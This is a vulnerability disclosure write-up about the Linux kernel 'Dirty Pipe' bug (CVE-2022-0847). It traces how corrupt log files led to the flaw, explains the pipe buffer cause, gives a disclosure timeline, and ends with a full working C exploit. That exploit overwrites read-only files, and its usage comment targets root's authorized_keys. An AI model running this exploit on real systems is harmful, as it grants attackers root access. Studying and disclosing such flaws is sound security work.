The Dirty Pipe Vulnerability¶

Max Kellermann <max.kellermann@ionos.com>

Abstract¶

This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.

It is similar to CVE-2016-5195 “Dirty Cow” but is easier to exploit.

The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.

Corruption pt. I¶

It all started a year ago with a support ticket about corrupt files. A customer complained that the access logs they downloaded could not be decompressed. And indeed, there was a corrupt log file on one of the log servers; it could be decompressed, but gzip reported a CRC error. I could not explain why it was corrupt, but I assumed the nightly split process had crashed and left a corrupt file behind. I fixed the file’s CRC manually, closed the ticket, and soon forgot about the problem.

Months later, this happened again and yet again. Every time, the file’s contents looked correct, only the CRC at the end of the file was wrong. Now, with several corrupt files, I was able to dig deeper and found a surprising kind of corruption. A pattern emerged.

Access Logging¶

Let me briefly introduce how our log server works: In the CM4all hosting environment, all web servers (running our custom open source HTTP server) send UDP multicast datagrams with metadata about each HTTP request. These are received by the log servers running Pond, our custom open source in-memory database. A nightly job splits all access logs of the previous day into one per hosted web site, each compressed with zlib.

Via HTTP, all access logs of a month can be downloaded as a single .gz file. Using a trick (which involves Z_SYNC_FLUSH), we can just concatenate all gzipped daily log files without having to decompress and recompress them, which means this HTTP request consumes nearly no CPU. Memory bandwidth is saved by employing the splice() system call to feed data directly from the hard disk into the HTTP connection, without passing the kernel/userspace boundary (“zero-copy”).

Windows users can’t handle .gz files, but everybody can extract ZIP files. A ZIP file is just a container for .gz files, so we could use the same method to generate ZIP files on-the-fly; all we needed to do was send a ZIP header first, then concatenate all .gz file contents as usual, followed by the central directory (another kind of header).

Corruption pt. II¶

This is how a the end of a proper daily file looks:

000005f0  81 d6 94 39 8a 05 b0 ed  e9 c0 fd 07 00 00 ff ff
00000600  03 00 9c 12 0b f5 f7 4a  00 00

The 00 00 ff ff is the sync flush which allows simple concatenation. 03 00 is an empty “final” block, and is followed by a CRC32 (0xf50b129c) and the uncompressed file length (0x00004af7 = 19191 bytes).

The same file but corrupted:

000005f0  81 d6 94 39 8a 05 b0 ed  e9 c0 fd 07 00 00 ff ff
00000600  03 00 50 4b 01 02 1e 03  14 00

The sync flush is there, the empty final block is there, but the uncompressed length is now 0x0014031e = 1.3 MB (that’s wrong, it’s the same 19 kB file as above). The CRC32 is 0x02014b50, which does not match the file contents. Why? Is this an out-of-bounds write or a heap corruption bug in our log client?

I compared all known-corrupt files and discovered, to my surprise, that all of them had the same CRC32 and the same “file length” value. Always the same CRC - this implies that this cannot be the result of a CRC calculation. With corrupt data, we would see different (but wrong) CRC values. For hours, I stared holes into the code but could not find an explanation.

Then I stared at these 8 bytes. Eventually, I realized that 50 4b is ASCII for “P” and “K”. “PK”, that’s how all ZIP headers start. Let’s have a look at these 8 bytes again:

50 4b 01 02 1e 03 14 00

50 4b is “PK”
01 02 is the code for central directory file header.
“Version made by” = 1e 03; 0x1e = 30 (3.0); 0x03 = UNIX
“Version needed to extract” = 14 00; 0x0014 = 20 (2.0)

The rest is missing; the header was apparently truncated after 8 bytes.

This is really the beginning of a ZIP central directory file header, this cannot be a coincidence. But the process which writes these files has no code to generate such header. In my desperation, I looked at the zlib source code and all other libraries used by that process but found nothing. This piece of software doesn’t know anything about “PK” headers.

There is one process which generates “PK” headers, though; it’s the web service which constructs ZIP files on-the-fly. But this process runs as a different user which doesn’t have write permissions on these files. It cannot possibly be that process.

None of this made sense, but new support tickets kept coming in (at a very slow rate). There was some systematic problem, but I just couldn’t get a grip on it. That gave me a lot of frustration, but I was busy with other tasks, and I kept pushing this file corruption problem to the back of my queue.

Corruption pt. III¶

External pressure brought this problem back into my consciousness. I scanned the whole hard disk for corrupt files (which took two days), hoping for more patterns to emerge. And indeed, there was a pattern:

there were 37 corrupt files within the past 3 months
they occurred on 22 unique days
18 of those days have 1 corruption
1 day has 2 corruptions (2021-11-21)
1 day has 7 corruptions (2021-11-30)
1 day has 6 corruptions (2021-12-31)
1 day has 4 corruptions (2022-01-31)

The last day of each month is clearly the one which most corruptions occur.

Only the primary log server had corruptions (the one which served HTTP connections and constructed ZIP files). The standby server (HTTP inactive but same log extraction process) had zero corruptions. Data on both servers was identical, minus those corruptions.

Is this caused by flaky hardware? Bad RAM? Bad storage? Cosmic rays? No, the symptoms don’t look like a hardware issue. A ghost in the machine? Do we need an exorcist?

Man staring at code¶

I began staring holes into my code again, this time the web service.

Remember, the web service writes a ZIP header, then uses splice() to send all compressed files, and finally uses write() again for the “central directory file header”, which begins with 50 4b 01 02 1e 03 14 00, exactly the corruption. The data sent over the wire looks exactly like the corrupt files on disk. But the process sending this on the wire has no write permissions on those files (and doesn’t even try to do so), it only reads them. Against all odds and against the impossible, it must be that process which causes corruptions, but how?

My first flash of inspiration why it’s always the last day of the month which gets corrupted. When a website owner downloads the access log, the server starts with the first day of the month, then the second day, and so on. Of course, the last day of the month is sent at the end; the last day of the month is always followed by the “PK” header. That’s why it’s more likely to corrupt the last day. (The other days can be corrupted if the requested month is not yet over, but that’s less likely.)

How?

Man staring at kernel code¶

After being stuck for more hours, after eliminating everything that was definitely impossible (in my opinion), I drew a conclusion: this must be a kernel bug.

Blaming the Linux kernel (i.e. somebody else’s code) for data corruption must be the last resort. That is unlikely. The kernel is an extremely complex project developed by thousands of individuals with methods that may seem chaotic; despite of this, it is extremely stable and reliable. But this time, I was convinced that it must be a kernel bug.

In a moment of extraordinary clarity, I hacked two C programs.

One that keeps writing odd chunks of the string “AAAAA” to a file (simulating the log splitter):

#include <unistd.h>
int main(int argc, char **argv) {
  for (;;) write(1, "AAAAA", 5);
}
// ./writer >foo

And one that keeps transferring data from that file to a pipe using splice() and then writes the string “BBBBB” to the pipe (simulating the ZIP generator):

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
int main(int argc, char **argv) {
  for (;;) {
    splice(0, 0, 1, 0, 2, 0);
    write(1, "BBBBB", 5);
  }
}
// ./splicer <foo |cat >/dev/null

I copied those two programs to the log server, and… bingo! The string “BBBBB” started appearing in the file, even though nobody ever wrote this string to the file (only to the pipe by a process without write permissions).

So this really is a kernel bug!

All bugs become shallow once they can be reproduced. A quick check verified that this bug affects Linux 5.10 (Debian Bullseye) but not Linux 4.19 (Debian Buster). There are 185.011 git commits between v4.19 and v5.10, but thanks to git bisect, it takes just 17 steps to locate the faulty commit.

The bisect arrived at commit f6dd975583bd, which refactors the pipe buffer code for anonymous pipe buffers. It changes the way how the “mergeable” check is done for pipes.

Pipes and Buffers and Pages¶

Why pipes, anyway? In our setup, the web service which generates ZIP files communicates with the web server over pipes; it talks the Web Application Socket protocol which we invented because we were not happy with CGI, FastCGI and AJP. Using pipes instead of multiplexing over a socket (like FastCGI and AJP do) has a major advantage: you can use splice() in both the application and the web server for maximum efficiency. This reduces the overhead for having web applications out-of-process (as opposed to running web services inside the web server process, like Apache modules do). This allows privilege separation without sacrificing (much) performance.

Short detour on Linux memory management: The smallest unit of memory managed by the CPU is a page (usually 4 kB). Everything in the lowest layer of Linux’s memory management is about pages. If an application requests memory from the kernel, it will get a number of (anonymous) pages. All file I/O is also about pages: if you read data from a file, the kernel first copies a number of 4 kB chunks from the hard disk into kernel memory, managed by a subsystem called the page cache. From there, the data will be copied to userspace. The copy in the page cache remains for some time, where it can be used again, avoiding unnecessary hard disk I/O, until the kernel decides it has a better use for that memory (“reclaim”). Instead of copying file data to userspace memory, pages managed by the page cache can be mapped directly into userspace using the mmap() system call (a trade-off for reduced memory bandwidth at the cost of increased page faults and TLB flushes). The Linux kernel has more tricks: the sendfile() system call allows an application to send file contents into a socket without a roundtrip to userspace (an optimization popular in web servers serving static files over HTTP). The splice() system call is kind of a generalization of sendfile(): It allows the same optimization if either side of the transfer is a pipe; the other side can be almost anything (another pipe, a file, a socket, a block device, a character device). The kernel implements this by passing page references around, not actually copying anything (zero-copy).

A pipe is a tool for unidirectional inter-process communication. One end is for pushing data into it, the other end can pull that data. The Linux kernel implements this by a ring of struct pipe_buffer, each referring to a page. The first write to a pipe allocates a page (space for 4 kB worth of data). If the most recent write does not fill the page completely, a following write may append to that existing page instead of allocating a new one. This is how “anonymous” pipe buffers work (anon_pipe_buf_ops).

If you, however, splice() data from a file into the pipe, the kernel will first load the data into the page cache. Then it will create a struct pipe_buffer pointing inside the page cache (zero-copy), but unlike anonymous pipe buffers, additional data written to the pipe must not be appended to such a page because the page is owned by the page cache, not by the pipe.

History of the check for whether new data can be appended to an existing pipe buffer:

Long ago, struct pipe_buf_operations had a flag called can_merge.
Commit 5274f052e7b3 “Introduce sys_splice() system call” (Linux 2.6.16, 2006) featured the splice() system call, introducing page_cache_pipe_buf_ops, a struct pipe_buf_operations implementation for pipe buffers pointing into the page cache, the first one with can_merge=0 (not mergeable).
Commit 01e7187b4119 “pipe: stop using ->can_merge” (Linux 5.0, 2019) converted the can_merge flag into a struct pipe_buf_operations pointer comparison because only anon_pipe_buf_ops has this flag set.
Commit f6dd975583bd “pipe: merge anon_pipe_buf*_ops” (Linux 5.8, 2020) converted this pointer comparison to per-buffer flag PIPE_BUF_FLAG_CAN_MERGE.

Over the years, this check was refactored back and forth, which was okay. Or was it?

Uninitialized¶

Several years before PIPE_BUF_FLAG_CAN_MERGE was born, commit 241699cd72a8 “new iov_iter flavour: pipe-backed” (Linux 4.9, 2016) added two new functions which allocate a new struct pipe_buffer, but initialization of its flags member was missing. It was now possible to create page cache references with arbitrary flags, but that did not matter. It was technically a bug, though without consequences at that time because all of the existing flags were rather boring.

This bug suddenly became critical in Linux 5.8 with commit f6dd975583bd “pipe: merge anon_pipe_buf*_ops”. By injecting PIPE_BUF_FLAG_CAN_MERGE into a page cache reference, it became possible to overwrite data in the page cache, simply by writing new data into the pipe prepared in a special way.

Corruption pt. IV¶

This explains the file corruption: First, some data gets written into the pipe, then lots of files get spliced, creating page cache references. Randomly, those may or may not have PIPE_BUF_FLAG_CAN_MERGE set. If yes, then the write() call that writes the central directory file header will be written to the page cache of the last compressed file.

But why only the first 8 bytes of that header? Actually, all of the header gets copied to the page cache, but this operation does not increase the file size. The original file had only 8 bytes of “unspliced” space at the end, and only those bytes can be overwritten. The rest of the page is unused from the page cache’s perspective (though the pipe buffer code does use it because it has its own page fill management).

And why does this not happen more often? Because the page cache does not write back to disk unless it believes the page is “dirty”. Accidently overwriting data in the page cache will not make the page “dirty”. If no other process happens to “dirty” the file, this change will be ephemeral; after the next reboot (or after the kernel decides to drop the page from the cache, e.g. reclaim under memory pressure), the change is reverted. This allows interesting attacks without leaving a trace on hard disk.

Exploiting¶

In my first exploit (the “writer” / “splicer” programs which I used for the bisect), I had assumed that this bug is only exploitable while a privileged process writes the file, and that it depends on timing.

When I realized what the real problem was, I was able to widen the hole by a large margin: it is possible to overwrite the page cache even in the absence of writers, with no timing constraints, at (almost) arbitrary positions with arbitrary data. The limitations are:

the attacker must have read permissions (because it needs to splice() a page into a pipe)
the offset must not be on a page boundary (because at least one byte of that page must have been spliced into the pipe)
the write cannot cross a page boundary (because a new anonymous buffer would be created for the rest)
the file cannot be resized (because the pipe has its own page fill management and does not tell the page cache how much data has been appended)

To exploit this vulnerability, you need to:

Create a pipe.
Fill the pipe with arbitrary data (to set the PIPE_BUF_FLAG_CAN_MERGE flag in all ring entries).
Drain the pipe (leaving the flag set in all struct pipe_buffer instances on the struct pipe_inode_info ring).
Splice data from the target file (opened with O_RDONLY) into the pipe from just before the target offset.
Write arbitrary data into the pipe; this data will overwrite the cached file page instead of creating a new anomyous struct pipe_buffer because PIPE_BUF_FLAG_CAN_MERGE is set.

To make this vulnerability more interesting, it not only works without write permissions, it also works with immutable files, on read-only btrfs snapshots and on read-only mounts (including CD-ROM mounts). That is because the page cache is always writable (by the kernel), and writing to a pipe never checks any permissions.

This is my proof-of-concept exploit:

/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann <max.kellermann@ionos.com>
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
 */

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/* fill the pipe completely; each pipe_buffer will now have
	   the PIPE_BUF_FLAG_CAN_MERGE flag */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		write(p[1], buffer, n);
		r -= n;
	}

	/* drain the pipe, freeing all pipe_buffer instances (but
	   leaving the flags initialized) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
		read(p[0], buffer, n);
		r -= n;
	}

	/* the pipe is now empty, and if somebody adds a new
	   pipe_buffer without initializing its "flags", the buffer
	   will be mergeable */
}

int main(int argc, char **argv)
{
	if (argc != 4) {
		fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
		return EXIT_FAILURE;
	}

	/* dumb command-line argument parser */
	const char *const path = argv[1];
	loff_t offset = strtoul(argv[2], NULL, 0);
	const char *const data = argv[3];
	const size_t data_size = strlen(data);

	if (offset % PAGE_SIZE == 0) {
		fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
		return EXIT_FAILURE;
	}

	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
	const loff_t end_offset = offset + (loff_t)data_size;
	if (end_offset > next_page) {
		fprintf(stderr, "Sorry, cannot write across a page boundary\n");
		return EXIT_FAILURE;
	}

	/* open the input file and validate the specified offset */
	const int fd = open(path, O_RDONLY); // yes, read-only! :-)
	if (fd < 0) {
		perror("open failed");
		return EXIT_FAILURE;
	}

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return EXIT_FAILURE;
	}

	if (offset > st.st_size) {
		fprintf(stderr, "Offset is not inside the file\n");
		return EXIT_FAILURE;
	}

	if (end_offset > st.st_size) {
		fprintf(stderr, "Sorry, cannot enlarge the file\n");
		return EXIT_FAILURE;
	}

	/* create the pipe with all flags initialized with
	   PIPE_BUF_FLAG_CAN_MERGE */
	int p[2];
	prepare_pipe(p);

	/* splice one byte from before the specified offset into the
	   pipe; this will add a reference to the page cache, but
	   since copy_page_to_iter_pipe() does not initialize the
	   "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
	--offset;
	ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
	if (nbytes < 0) {
		perror("splice failed");
		return EXIT_FAILURE;
	}
	if (nbytes == 0) {
		fprintf(stderr, "short splice\n");
		return EXIT_FAILURE;
	}

	/* the following write will not create a new pipe_buffer, but
	   will instead write into the page cache, because of the
	   PIPE_BUF_FLAG_CAN_MERGE flag */
	nbytes = write(p[1], data, data_size);
	if (nbytes < 0) {
		perror("write failed");
		return EXIT_FAILURE;
	}
	if ((size_t)nbytes < data_size) {
		fprintf(stderr, "short write\n");
		return EXIT_FAILURE;
	}

	printf("It worked!\n");
	return EXIT_SUCCESS;
}

Timeline¶

2021-04-29: first support ticket about file corruption
2022-02-19: file corruption problem identified as Linux kernel bug, which turned out to be an exploitable vulnerability
2022-02-20: bug report, exploit and patch sent to the Linux kernel security team
2022-02-21: bug reproduced on Google Pixel 6; bug report sent to the Android Security Team
2022-02-21: patch sent to LKML (without vulnerability details) as suggested by Linus Torvalds, Willy Tarreau and Al Viro
2022-02-23: Linux stable releases with my bug fix (5.16.11, 5.15.25, 5.10.102)
2022-02-24: Google merges my bug fix into the Android kernel
2022-02-28: notified the linux-distros mailing list
2022-03-07: public disclosure